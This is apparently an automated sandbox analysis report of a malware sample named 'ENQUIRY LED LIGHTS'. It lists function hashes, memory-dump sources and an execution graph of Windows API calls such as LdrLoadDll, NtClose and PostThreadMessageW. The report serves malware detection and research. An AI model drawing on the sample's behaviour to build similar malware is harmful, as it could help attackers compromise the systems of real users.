                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 134899ecb35ff577f5da4dbc7e2a365d0b0af27be25fce12a33f61904abf7ac7
                                                                                                  • Instruction ID: 17a13430c73fe810a71496b9830072dd0317decb5f4804988e3593d3b489517a
                                                                                                  • Opcode Fuzzy Hash: 134899ecb35ff577f5da4dbc7e2a365d0b0af27be25fce12a33f61904abf7ac7
                                                                                                  • Instruction Fuzzy Hash: 1F11D2B5C006898FCB20CF9AD444A9FFBF4EB88324F14845AD429A7610D379AA45CFA1
                                                                                                  Function 0094D1FC Relevance: .1, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731213777.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_94d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39b236b4e99ffa8ebb883e8bd8238a77dd747e908e07a2a48afa200487366444
                                                                                                  • Instruction ID: 7483310cd2e3755affa53c06227b4121534d1f3d20106753430136b7fbdca585
                                                                                                  • Opcode Fuzzy Hash: 39b236b4e99ffa8ebb883e8bd8238a77dd747e908e07a2a48afa200487366444
                                                                                                  • Instruction Fuzzy Hash: 38210675505240DFDB05DF54D8C0F26BFA5FB88310F24C669E9090B246C37AD816CBA1
                                                                                                  Function 0094D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731213777.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_94d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 326d633e69fe9366d7530a393fb16d58ddc2584c5cf5a688fbff2d20122111a4
                                                                                                  • Instruction ID: 4ae44841bf71005cea118d41d840004451676eeb5bbfb75d7b934d120321927c
                                                                                                  • Opcode Fuzzy Hash: 326d633e69fe9366d7530a393fb16d58ddc2584c5cf5a688fbff2d20122111a4
                                                                                                  • Instruction Fuzzy Hash: 042145B5604240DFDB05DF14D8C0F26BF69FB98318F24CA69E9090B25AC73AD816CAA1
                                                                                                  Function 0095D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731260365.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_95d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d80b083b2cc135e0bc13169a490c04272064927ce8ab837ed1051abdda287ed6
                                                                                                  • Instruction ID: 94220343b7992cd7a7e30896bb1f5234e07350df541d8512fc0179d5e870e2a9
                                                                                                  • Opcode Fuzzy Hash: d80b083b2cc135e0bc13169a490c04272064927ce8ab837ed1051abdda287ed6
                                                                                                  • Instruction Fuzzy Hash: 7D212971505200DFDB25DF15D5C0B26BBA5FB88315F24C96DED094F251C33AD84ACB61
                                                                                                  Function 0095D01C Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731260365.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_95d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f26de7d2c09d4594301687fa6b9f5b1653a4f95e3915905b0431070da414f04
                                                                                                  • Instruction ID: 00f39e0ceddf7ae3bb2831c67913d453dae445844aacb653d2e1197bab0b07af
                                                                                                  • Opcode Fuzzy Hash: 9f26de7d2c09d4594301687fa6b9f5b1653a4f95e3915905b0431070da414f04
                                                                                                  • Instruction Fuzzy Hash: C5210771505240DFDB24DF25D5C0B26BBA5FB88315F24C96DDD094B296C33AD80BCB61
                                                                                                  Function 0095D005 Relevance: .1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731260365.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_95d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9653f8d5ecada623100e8c6b84887df8c8e20d08e4fa5f042e1c443e329842de
                                                                                                  • Instruction ID: 775f0dc26dac41fac21c4fee6bfa9bc05605bf26b6f24e1395804529b05bfabf
                                                                                                  • Opcode Fuzzy Hash: 9653f8d5ecada623100e8c6b84887df8c8e20d08e4fa5f042e1c443e329842de
                                                                                                  • Instruction Fuzzy Hash: D52184755093C0CFDB16CF24D994B15BF71EB46314F28C5DAD8498B6A7C33A980ACB62
                                                                                                  Function 0094D1F7 Relevance: .1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731213777.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_94d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                                                                  • Instruction ID: fda5eb0cfd8d3d3566b7f546a8e3901ee101c8400712e923892b582ef734c6a0
                                                                                                  • Opcode Fuzzy Hash: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                                                                  • Instruction Fuzzy Hash: CD21B176504280DFDB16CF50D9C4B16BF72FB84314F24C6A9DD094B656C37AD82ACBA1
                                                                                                  Function 0094D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731213777.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_94d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                  • Instruction ID: 0b722a354e866d7fa94f0bde33e3a71bae8cbf165b559a33f55bd274dd909b3f
                                                                                                  • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                  • Instruction Fuzzy Hash: 0C112676504280CFDB12CF10D5C0F16BF71FB94314F24C6A9E8094B25AC33AD85ACBA1
                                                                                                  Function 0095D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731260365.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_95d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                  • Instruction ID: bdf4bb6f4f29b98ffb85737709bfcaeb2d25446d305192df4a484065f4ac9829
                                                                                                  • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                  • Instruction Fuzzy Hash: 8711BB75504280DFDB22CF10C5C0B15BBA1FB84314F24C6ADDC494B296C33AD84ACB61

                                                                                                  Non-executed Functions

                                                                                                  Function 04C10040 Relevance: .3, Instructions: 315COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ac1e2ca4459615527c03222bd4864bd2f593cd8d5459acdeb830d3e96116afc2
                                                                                                  • Instruction ID: dfcd0cb556af55aa0b702901351a74a4a286399ea479b0124e2ba4aae25e50d3
                                                                                                  • Opcode Fuzzy Hash: ac1e2ca4459615527c03222bd4864bd2f593cd8d5459acdeb830d3e96116afc2
                                                                                                  • Instruction Fuzzy Hash: 861262B0401F478AD710CF65FD4C9893BB1B795328B904209D262AB3F9DBB925DACF64
                                                                                                  Function 00CED63C Relevance: .3, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc4c6effb40b8aa68245237b750e6966a51c0a80ec445e31c6ada8d09f568b5d
                                                                                                  • Instruction ID: 045ae671839493fb9c049d5e938d6ac56d86ae5cf3b12796f7416a041eca77d9
                                                                                                  • Opcode Fuzzy Hash: bc4c6effb40b8aa68245237b750e6966a51c0a80ec445e31c6ada8d09f568b5d
                                                                                                  • Instruction Fuzzy Hash: 86A16D36E0024A8FCF15DFA6C84059EB7B2FF85300B15857EE915AB261DB71EE16CB50
                                                                                                  Function 04C10007 Relevance: .2, Instructions: 241COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aba7884097a6a97ca4f153aa859cf5524d3ef6292499d574976526065e803a35
                                                                                                  • Instruction ID: 74cb26c2d78ae71babd60829957a1ca52e6fbf6bb63aca070f4eeeaad11e2582
                                                                                                  • Opcode Fuzzy Hash: aba7884097a6a97ca4f153aa859cf5524d3ef6292499d574976526065e803a35
                                                                                                  • Instruction Fuzzy Hash: AEC1E7B0801B478BD710CF65FD889897BB1BB95314B644309D162AB3F9DBB824DACF64

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                                                  Signature Coverage:9.2%
                                                                                                  Total number of Nodes:131
                                                                                                  Total number of Limit Nodes:9
                                                                                                  execution_graph 92245 419544 92248 42ce6f 92245->92248 92247 41954e 92249 42ce8c 92248->92249 92250 42ce9d NtClose 92249->92250 92250->92247 92293 2f52b60 LdrInitializeThunk 92251 43002f 92252 430045 92251->92252 92253 43003f 92251->92253 92256 42f00f 92252->92256 92255 43006b 92259 42d18f 92256->92259 92258 42f02a 92258->92255 92260 42d1ac 92259->92260 92261 42d1bd RtlAllocateHeap 92260->92261 92261->92258 92262 43008f 92265 42ef2f 92262->92265 92268 42d1df 92265->92268 92267 42ef48 92269 42d1f9 92268->92269 92270 42d20a RtlFreeHeap 92269->92270 92270->92267 92294 40235c 92295 40236f 92294->92295 92298 4304ff 92295->92298 92301 42eadf 92298->92301 92302 42eb05 92301->92302 92313 407dbf 92302->92313 92304 42eb1b 92305 402433 92304->92305 92316 41b8ef 92304->92316 92307 42eb3a 92308 42eb4f 92307->92308 92331 42d22f 92307->92331 92327 428b4f 92308->92327 92311 42eb69 92312 42d22f ExitProcess 92311->92312 92312->92305 92315 407dcc 92313->92315 92334 416c4f 92313->92334 92315->92304 92317 41b91b 92316->92317 92345 41b7df 92317->92345 92320 41b960 92322 41b97c 92320->92322 92325 42ce6f NtClose 92320->92325 92321 41b948 92323 41b953 92321->92323 92324 42ce6f NtClose 92321->92324 92322->92307 92323->92307 92324->92323 92326 41b972 92325->92326 92326->92307 92328 428bb1 92327->92328 92330 428bbe 92328->92330 92356 418def 92328->92356 92330->92311 92332 42d24c 92331->92332 92333 42d25d ExitProcess 92332->92333 92333->92308 92335 416c6c 92334->92335 92337 416c85 92335->92337 92338 42d8bf 92335->92338 92337->92315 92340 42d8d9 92338->92340 92339 42d908 92339->92337 92340->92339 92341 42c4cf LdrInitializeThunk 92340->92341 92342 42d968 92341->92342 92343 42ef2f RtlFreeHeap 92342->92343 92344 42d981 92343->92344 92344->92337 92346 41b7f9 92345->92346 92350 41b8d5 92345->92350 92351 42c56f 92346->92351 92349 42ce6f NtClose 92349->92350 92350->92320 92350->92321 92352 42c589 92351->92352 92355 2f535c0 LdrInitializeThunk 92352->92355 92353 41b8c9 92353->92349 92355->92353 92358 418e19 92356->92358 92357 419327 92357->92330 92358->92357 92364 4144cf 92358->92364 92360 418f46 92360->92357 92361 42ef2f RtlFreeHeap 92360->92361 92362 418f5e 92361->92362 92362->92357 92363 42d22f ExitProcess 92362->92363 92363->92357 92365 4144ef 92364->92365 92367 414558 92365->92367 92369 41bbff RtlFreeHeap LdrInitializeThunk 92365->92369 92367->92360 92368 41454e 92368->92360 92369->92368 92370 42c47f 92371 42c499 92370->92371 92374 2f52df0 LdrInitializeThunk 92371->92374 92372 42c4c1 92374->92372 92375 42521f 92376 42523b 92375->92376 92377 425263 92376->92377 92378 425277 92376->92378 92379 42ce6f NtClose 92377->92379 92380 42ce6f NtClose 92378->92380 92381 42526c 92379->92381 92382 425280 92380->92382 92385 42f04f RtlAllocateHeap 92382->92385 92384 42528b 92385->92384 92386 4255bf 92390 4255d8 92386->92390 92387 425623 92388 42ef2f RtlFreeHeap 92387->92388 92389 425633 92388->92389 92390->92387 92391 425663 92390->92391 92393 425668 92390->92393 92392 42ef2f RtlFreeHeap 92391->92392 92392->92393 92271 4142ef 92274 42d0ef 92271->92274 92275 42d10c 92274->92275 92278 2f52c70 LdrInitializeThunk 92275->92278 92276 414311 92278->92276 92279 41ecef 92280 41ed15 92279->92280 92284 41ee0c 92280->92284 92285 4300cf RtlAllocateHeap RtlFreeHeap 92280->92285 92282 41edaa 92282->92284 92286 42c4cf 92282->92286 92285->92282 92287 42c4ec 92286->92287 92290 2f52c0a 92287->92290 92288 42c518 92288->92284 92291 2f52c11 92290->92291 92292 2f52c1f LdrInitializeThunk 92290->92292 92291->92288 92292->92288 92394 41485f 92395 414868 92394->92395 92400 417f8f 92395->92400 92397 414897 92398 4148dc 92397->92398 92399 4148cb PostThreadMessageW 92397->92399 92399->92398 92402 417fb3 92400->92402 92401 417fba 92401->92397 92402->92401 92403 418006 92402->92403 92404 417fef LdrLoadDll 92402->92404 92403->92397 92404->92403 92405 41badf 92406 41bb23 92405->92406 92407 42ce6f NtClose 92406->92407 92408 41bb44 92406->92408 92407->92408

                                                                                                  Executed Functions

                                                                                                  Function 00417F8F Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 67 417f8f-417fb8 call 42fc2f 70 417fba-417fbd 67->70 71 417fbe-417fcc call 43016f 67->71 74 417fdc-417fed call 42e5af 71->74 75 417fce-417fd9 call 43040f 71->75 80 418006-418009 74->80 81 417fef-418003 LdrLoadDll 74->81 75->74 81->80
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418001
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: ba351a46981eeeefc6d2249afc5c28acff991cf894cb65777e902435abb4b041
                                                                                                  • Instruction ID: 1cccb35332fc1bfc769912fd4e9da1ec7d277bdec11d6e2234e46599e8717976
                                                                                                  • Opcode Fuzzy Hash: ba351a46981eeeefc6d2249afc5c28acff991cf894cb65777e902435abb4b041
                                                                                                  • Instruction Fuzzy Hash: 140152B1E0020DBBDF10DAE5DC52FDEB3789B14308F0041A9E9089B240F635EB488795
                                                                                                  Function 0042CE6F Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 87 42ce6f-42ceab call 4050ff call 42e0af NtClose
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CEA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction ID: e48be2077ec1f62cdc2065104f26cebca0e8b19f2d11af3755b96455d3f2d924
                                                                                                  • Opcode Fuzzy Hash: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction Fuzzy Hash: BBE04F362002147BD220EA5ADC41EDB779CDFC5714F108019FA0867242DA71790187E5
                                                                                                  Function 02F52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 101 2f52b60-2f52b6c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a2a84bc78bc7796fab709d5ab682f3cef0fcfdead3a97fa8393fa7516b4dee23
                                                                                                  • Instruction ID: 65482c9b0b652e7dcc5a0f27c4f8d511055fbb2e0967d2417f352881fed67827
                                                                                                  • Opcode Fuzzy Hash: a2a84bc78bc7796fab709d5ab682f3cef0fcfdead3a97fa8393fa7516b4dee23
                                                                                                  • Instruction Fuzzy Hash: C29002A120240013410571588418627401AC7E0281B55C025E6014590DC52689956125
                                                                                                  Function 02F52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 102 2f52c70-2f52c7c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 65018cc7bf26631e2d7d116d622047983cc59627f844b8c263e375893e395278
                                                                                                  • Instruction ID: 9c129e3d85f65b65fa391d44a3871bf91c88495263d119b8aa3c5ca20e47609e
                                                                                                  • Opcode Fuzzy Hash: 65018cc7bf26631e2d7d116d622047983cc59627f844b8c263e375893e395278
                                                                                                  • Instruction Fuzzy Hash: F590027120148812D1107158C40875B0015C7D0381F59C415A9424658D869689957121
                                                                                                  Function 02F52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 103 2f52df0-2f52dfc LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 577801e3011b5d3fac556d927851d2b00a1012a1fe58965e19ed6e1bacc2fb2f
                                                                                                  • Instruction ID: 39558fc426485b5565a94b021d344ff492192d646055543e093fd7182b86f069
                                                                                                  • Opcode Fuzzy Hash: 577801e3011b5d3fac556d927851d2b00a1012a1fe58965e19ed6e1bacc2fb2f
                                                                                                  • Instruction Fuzzy Hash: 3190027120140423D111715885087170019C7D02C1F95C416A5424558D96578A56A121
                                                                                                  Function 02F535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 104 2f535c0-2f535cc LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0042f55688dfffcf431ac64d41c3d126fa53c34ca7d486da1877a716f6e229e5
                                                                                                  • Instruction ID: 90da9614664562e0fdcdd7217199530707dfbbd8c8d93cd50c991b635d5c7b37
                                                                                                  • Opcode Fuzzy Hash: 0042f55688dfffcf431ac64d41c3d126fa53c34ca7d486da1877a716f6e229e5
                                                                                                  • Instruction Fuzzy Hash: 8D90027160550412D100715885187171015C7D0281F65C415A5424568D87968A5565A2
                                                                                                  Function 00414856 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34R62IL6,00000111,00000000,00000000), ref: 004148D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: *-?$34R62IL6$34R62IL6
                                                                                                  • API String ID: 1836367815-339224027
                                                                                                  • Opcode ID: e7ce8764245a57f1967058a74f11efdb368f3cb64611681f62a21007495cc65c
                                                                                                  • Instruction ID: 93d2494d711a22572ba8abbc03a095a9c6acfaf2570a327c710175af6841f9b9
                                                                                                  • Opcode Fuzzy Hash: e7ce8764245a57f1967058a74f11efdb368f3cb64611681f62a21007495cc65c
                                                                                                  • Instruction Fuzzy Hash: A311E576E4011CBEDB11A6E29C82DEFBB7CDF41398F45806AFA04B7241D2384E0687A1
                                                                                                  Function 00414770 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 16 414770-41477c 17 4147e1-4147eb 16->17 18 4147df 16->18 17->18 19 4147ed-414812 17->19 18->17 20 414814-414820 19->20 21 41488b-4148c9 call 417f8f call 40506f call 4256df 19->21 22 414822-414827 20->22 23 414868-41488a call 42efcf call 42f9df 20->23 34 4148e9-4148ef 21->34 35 4148cb-4148da PostThreadMessageW 21->35 23->21 35->34 36 4148dc-4148e6 35->36 36->34
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 34R62IL6$34R62IL6
                                                                                                  • API String ID: 0-3518893942
                                                                                                  • Opcode ID: b6dd35f1b2198e80e3cfd305f280b3c47f8f444a53fc9a9db770cb060db0427d
                                                                                                  • Instruction ID: 00f5f099f56cf70717aac5dc441418e4398190be132674ba2019f658456b68f5
                                                                                                  • Opcode Fuzzy Hash: b6dd35f1b2198e80e3cfd305f280b3c47f8f444a53fc9a9db770cb060db0427d
                                                                                                  • Instruction Fuzzy Hash: F521A272E4015CBFDB11AAB4DC829EFBB6CCF81758F444169E950AF281C63C8D42C795
                                                                                                  Function 0041485F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34R62IL6,00000111,00000000,00000000), ref: 004148D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 34R62IL6$34R62IL6
                                                                                                  • API String ID: 1836367815-3518893942
                                                                                                  • Opcode ID: c5e0942ead8e6ea82e775b116d5798144ed42762aa8ca36eca8b7571f070ab55
                                                                                                  • Instruction ID: c5defa56194e0008c814cd7e630feefad940789aef0d815f4bf3cde8152a4406
                                                                                                  • Opcode Fuzzy Hash: c5e0942ead8e6ea82e775b116d5798144ed42762aa8ca36eca8b7571f070ab55
                                                                                                  • Instruction Fuzzy Hash: 2E01C472E0025C7EDB11A6E29C82DEFBB7CDF41398F44806AFA04B7241D5784E068BA5
                                                                                                  Function 0042D1DF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 53 42d1df-42d220 call 4050ff call 42e0af RtlFreeHeap
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D21B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: lA
                                                                                                  • API String ID: 3298025750-748863793
